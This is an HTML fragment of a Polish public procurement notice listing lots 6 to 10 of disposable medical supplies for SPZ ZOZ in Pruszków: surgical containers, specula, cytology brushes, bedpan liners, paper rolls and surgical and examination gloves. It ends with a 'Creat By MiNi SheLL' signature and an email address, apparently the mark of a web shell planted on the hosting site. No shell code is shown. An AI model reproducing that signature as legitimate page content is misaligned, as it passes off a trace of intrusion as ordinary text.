<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pojemniki chirurgiczny     15ml  zakręcane	1200 szt.
Pojemniki chirurgiczny     30ml zakręcane	1950 szt.
Pojemniki chirurgiczny   100 ml zakręcane	100 szt.
Pojemniki chirurgiczny   125 ml zamykane	750 szt.
Pojemniki chirurgiczny   250 ml zamykane	350 szt.
Pojemniki chirurgiczny   500 ml zamykane	200 szt.
Pojemniki chirurgiczny  1000 ml zamykane	150 szt.
Pojemniki chirurgiczny  3000 ml zamykane	120 szt.
Pojemniki chirurgiczny  5000 ml zamykane	30 szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wzierniki jednorazowe plastikowe   S 	5700 szt.
Wzierniki jednorazowe plastikowe   M 	5700 szt.
Wzierniki jednorazowe plastikowe   L 	2700 szt.
Szkiełka do cytologii  1 0op =50szt.	68 op.
Osłonki lateksowe na głowice USG 1op. -200szt.	12op.
Szczoteczki do cytologii sterylne 	1800 szt
Szczoteczki do cytologii wachlarz  sterylne 1op. =50szt	44op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wkłady do basenów jednorazowe 1op.=20szt	325 op.
Wkłady do kaczek jednorazowe 1op=20szt	30op.
Worki na wymiociny jednorazowe 1op.=20szt	130op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawę sprzętu medycznego jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Podkłady papierowe -białe dwuwarstwowe ,celuloza  szer. 500mm,dł. 65m.,ilość listków w roli 141,gramatura 1m2=19g/m2  	4000 rol.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Dostawę rękawiczek medycznych jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawiczki chirurgiczne sterylne beztalkowe 6    (op.= 50par)	56 op.
 Rękawiczki chirurgiczne sterykne beztalkowe 6,5 (op.= 50par)	106op.
 Rękawiczki  chirurgiczne sterykne beztalkowe 7 (op.= 50par)	172 op.
 Rękawiczki  chirurgiczne sterykne beztalkowe   7,5 (op.= 50par)	 232 op.
 Rękawiczki  chirurgiczne sterykne beztalkowe  8    (op.= 50par)	232 op
Rękawiczki  chirurgiczne sterykne beztalkowe 8,5 (op.= 50par)	100op
Rękawiczki  chirurgiczne sterykne pudrowane 6,5 (op.= 50par)	62 op.
Rękawiczki  chirurgiczne sterykne pudrowane 7 (op.= 50par)	60 op
Rękawiczki  chirurgiczne sterykne pudrowane 7,5 (op.= 50par)	72 op
Rękawiczki  chirurgiczne sterykne pudrowane 8 (op.= 50par)	56 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Dostawę rękawiczek medycznych jednorazowego użytku dla potrzeb SPZ ZOZ w Pruszkowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Rękawiczki lateksowe  pudrowane (op.=100szt) S
	   30op.
 Rękawiczki lateksowe  pudrowane (op.=100szt) M	40 op
  .
Rękawiczki lateksowe  pudrowane (op.=100szt) L
	30 op
Rękawice nitrylowe  bezpudrowe (op.=100szt)XS
	   500op.
Rękawice nitrylowe  bezpudrowe (op.=100szt)S
	 3 200op
Rękawice nitrylowe   bezpudrowe (op.=100szt)M
	5 600op
Rękawice nitrylowe   bezpudrowe(op.=100szt) L
	  2800op
Rękawice nitrylowe   bezpudrowe(op.=100szt)X L
	540op
Rękawice foliowe
	33000szt.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 33.00.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com